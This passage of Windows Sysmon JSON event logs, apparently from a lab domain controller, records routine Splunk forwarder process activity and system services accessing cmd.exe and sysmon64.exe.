Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.536","SourceProcessGUID":"{E2A3D6B1-106F-5F25-0000-00102DF20300}","SourceProcessId":"3780","SourceThreadId":"3748","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2094,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.570\r\nProcessGuid: {E2A3D6B1-106F-5F25-0000-0010C4F40300}\r\nProcessId: 3784\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2>&1\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.570","ProcessGuid":"{E2A3D6B1-106F-5F25-0000-0010C4F40300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\" _internal check-xml-files --answer-yes --no-prompt 2&gt;&amp;1","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 3812\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nTargetProcessId: 3784\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"3812","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001016930300}","TargetProcessId":"3784","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+edcb8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+eef54|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ebd46|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001016930300}\r\nTargetProcessId: 3784\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001016930300}","TargetProcessId":"3784","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2100,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:19.568\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:19.568","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
